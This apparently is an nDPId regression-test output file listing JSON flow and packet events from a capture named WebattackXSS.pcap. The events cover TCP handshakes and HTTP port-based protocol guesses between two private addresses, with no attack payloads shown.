+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1499347758774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83kZAAD4G54msEAABwKgKMuzSAFAZPzI8AAAAAKACchA4sAAAAgQFtAQCCAoBO+x6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":2,"flow_last_seen":1499347758774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7NL2+p6BGT8yPaAScSDiPQAAAgQFtAQCCAoD5b3vATvsegEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6601,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":3,"flow_last_seen":1499347758775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347758775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03kdAAD4G55CsEAABwKgKMuzSAFAZPzI99vqegoAQAOWBRQAAAQEICgE77HoD5b3v"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347761418,"flow_last_seen":1499347761418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761418,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1499347761418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apdAAD4GWzmsEAABwKgKMuzsAFC\/aIWYAAAAAKACchA8ewAAAgQFtAQCCAoBO+8PAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":2,"flow_last_seen":1499347761418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7OwFUgVYv2iFmaAScSBuRgAAAgQFtAQCCAoD5cCEATvvDwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":3,"flow_last_seen":1499347761419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347761419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aphAAD4GW0CsEAABwKgKMuzsAFC\/aIWZBVIFWYAQAOUNTgAAAQEICgE77w8D5cCE"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347626349,"flow_last_seen":1499347631791,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347762675,"flow_last_seen":1499347762675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347762675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1499347762675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U3VAAD4GclusEAABwKgKMuz6AFDBm6M8AAAAAKACchAbXAAAAgQFtAQCCAoBO\/BJAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":2,"flow_last_seen":1499347762675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Proa5y3wZujPaAScSDRcwAAAgQFtAQCCAoD5cG+ATvwSQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":3,"flow_last_seen":1499347762676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347762676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U3ZAAD4GcmKsEAABwKgKMuz6AFDBm6M96GucuIAQAOVwewAAAQEICgE78EkD5cG+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347765229,"flow_last_seen":1499347765229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347765229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1499347765229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oyZAAD4GIqqsEAABwKgKMu0UAFACp1HuAAAAAKACchApBgAAAgQFtAQCCAoBO\/LIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6652,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":2,"flow_last_seen":1499347765230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765230,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7RRH+ZWsAqdR76AScSCEHQAAAgQFtAQCCAoD5cQ8ATvyyAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":3,"flow_last_seen":1499347765230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347765230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oydAAD4GIrGsEAABwKgKMu0UAFACp1HvR\/mVrYAQAOUjJQAAAQEICgE78sgD5cQ8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347766506,"flow_last_seen":1499347766506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347766506,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1499347766506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMu0iAFC65SV2AAAAAKACchCb8gAAAgQFtAQCCAoBO\/QHAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":2,"flow_last_seen":1499347766506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7SI0\/7eouuUld6AScSDmxwAAAgQFtAQCCAoD5cV8ATv0BwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6662,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":3,"flow_last_seen":1499347766507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347766507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMu0iAFC65SV3NP+3qYAQAOWFzwAAAQEICgE79AcD5cV8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347767793,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347767793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sEFAAD4GFY+sEAABwKgKMu0wAFC7\/0UIAAAAAKACchB59gAAAgQFtAQCCAoBO\/VJAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":2,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7TCCU6kzu\/9FCaAScSCEqwAAAgQFtAQCCAoD5ca9ATv1SQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6674,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":3,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sEJAAD4GFZasEAABwKgKMu0wAFC7\/0UJglOpNIAQAOUjswAAAQEICgE79UkD5ca9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347769077,"flow_last_seen":1499347769077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347769077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1499347769077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8n3VAAD4GJlusEAABwKgKMu0+AFAozWn\/AAAAAKACchDm4gAAAgQFtAQCCAoBO\/aKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":2,"flow_last_seen":1499347769077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7T59G4FkKM1qAKAScSAdXgAAAgQFtAQCCAoD5cf+ATv2igEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":3,"flow_last_seen":1499347769078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347769078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0n3ZAAD4GJmKsEAABwKgKMu0+AFAozWoAfRuBZYAQAOW8ZQAAAQEICgE79ooD5cf+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347770345,"flow_last_seen":1499347770345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347770345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1499347770345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8anZAAD4GW1qsEAABwKgKMu1MAFBCsJ2xAAAAAKACchCYAgAAAgQFtAQCCAoBO\/fHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6694,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":2,"flow_last_seen":1499347770345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7UyjrEwnQrCdsqAScSDb7AAAAgQFtAQCCAoD5ck7ATv3xwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6695,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":3,"flow_last_seen":1499347770346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347770346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0andAAD4GW2GsEAABwKgKMu1MAFBCsJ2yo6xMKIAQAOV69AAAAQEICgE798cD5ck7"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347771635,"flow_last_seen":1499347771635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1499347771635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jzNAAD4GNp2sEAABwKgKMu1aAFBxsHY6AAAAAKACchCPKQAAAgQFtAQCCAoBO\/kJAAAAAAEDAwc="} 